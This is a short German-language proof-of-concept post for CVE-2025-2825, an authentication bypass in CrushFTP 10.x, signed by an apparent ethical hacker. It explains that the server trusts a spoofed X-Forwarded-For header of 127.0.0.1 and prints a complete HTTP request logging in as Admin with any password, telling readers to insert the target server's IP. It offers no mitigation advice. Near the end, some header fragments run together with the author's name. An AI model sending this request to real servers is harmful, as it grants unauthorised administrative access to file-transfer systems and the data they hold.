
Proof-of-Concept zur Authentifizierungsumgehung für CVE-2025-2825 – Ausnutzung von CrushFTP 10.x
CVE-2025-2825 ist eine kritische Schwachstelle zur Authentifizierungsumgehung, die CrushFTP betrifft, einen weit verbreiteten sicheren Dateiübertragungsserver. Der Fehler ermöglicht es entfernten Angreifern, die Login-Authentifizierung zu umgehen und administrative Zugriffe zu erlangen, indem sie Header fälschen – und den Server so dazu bringen, zu glauben, die Anfrage käme von localhost.
Die Schwachstelle entsteht aufgrund einer unzureichenden Validierung des X-Forwarded-For-Headers. Wenn dieser Header auf 127.0.0.1 gesetzt ist, behandelt der Server die Anfrage als lokal – und umgeht so die Authentifizierung.
GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1
Host: target-ip
X-Forwarded-For: 127.0.0.1
📝 Ersetzen Sie
target-ipdurch die tatsächliche IP-Adresse des Ziel-CrushFTP-Servers.
Bei Erfolg umgeht der Server die Authentifizierung und gewährt Zugriff – selbst mit falschen Anmeldedaten.
X-Forwarded-For: 127.0.0.1
X-Forwarded-For.Shivshant Patil
Certified Ethical Hacker (CEH v13)
B.Tech-Absolvent der Computertechnik
🔗 LinkedIn-Profil
🔗 GitHub-Profil